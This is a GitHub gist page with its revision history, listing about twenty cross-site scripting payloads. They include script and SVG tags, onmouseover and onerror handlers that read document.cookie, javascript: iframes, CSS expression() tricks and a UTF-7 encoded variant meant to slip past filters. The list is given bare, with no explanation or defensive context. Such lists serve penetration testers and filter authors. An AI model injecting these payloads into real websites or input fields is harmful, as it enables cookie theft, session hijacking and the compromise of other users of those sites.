-
-
Save hakatashi/0a8915f72e4630e30c8c to your computer and use it in GitHub Desktop.
Revisions
-
hakatashi revised this gist
Oct 9, 2014 . 1 changed file with 1 addition and 1 deletion.There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -16,4 +16,4 @@ * `"><svg><script>alert(/1/.source)</script>` * `<div style="left:expression(alert('XSS'))">` * `<div style="left:expRessioN(alert('XSS'))">` * `+ADw-/title+AD4APA-meta http-equiv+AD0-'content-type' content+AD0-'text/html+ADs-charset+AD0-utf-7'+AD4APA-script+AD4-alert(+ACI-XSS+ACI-)+ADw-/script+AD4-` -
Oct 9, 2014 . 1 changed file with 2 additions and 1 deletion.There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -15,4 +15,5 @@ * `<svg><style><img/src=x onerror=alert(XSS)// </b>` * `"><svg><script>alert(/1/.source)</script>` * `<div style="left:expression(alert('XSS'))">` * `<div style="left:expRessioN(alert('XSS'))">` * `+ADw-/title+AD4APA-meta http-equiv+AD0-'content-type' content+AD0-'text/html+ADs-charset+AD0-utf-7'+AD4-+ADw-script+AD4-alert(+ACI-XSS+ACI-)+ADw-/script+AD4-` -
ntddk created this gist
Oct 8, 2014 .There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -0,0 +1,18 @@ * `'';!--"<XSS>=&{()}``\"` * `<script>alert(XSS);</script>` * `"><script>alert(XSS);</script>` * `<ScrIpt>alert(1);</SCript>` * `<a onmouseover="alert(document.cookie)">XSS</a>` * `<a onmouseover=alert(document.cookie)>XSS</a>` * `<<script>alert("XSS");//<</script>` * `<iframe src="javascript:alert('XSS');"></iframe>` * `<iframe src=# onmouseover="alert(document.cookie)"></iframe>` * `<img src="http://www.example.com/>"onerror="alert(document.cookie)//<">` * `<![CDATA["><script>alert("XSS")</script><!--]]>` * `";alert(document.domain)//` * `<SELECT NAME="" onmouseover=alert(XSS)></select>` * `<style><img src='</style><img src=x onerror=alert("XSS")//'>` * `<svg><style><img/src=x onerror=alert(XSS)// </b>` * `"><svg><script>alert(/1/.source)</script>` * `<div style="left:expression(alert('XSS'))">` * `<div style="left:expRessioN(alert('XSS'))">`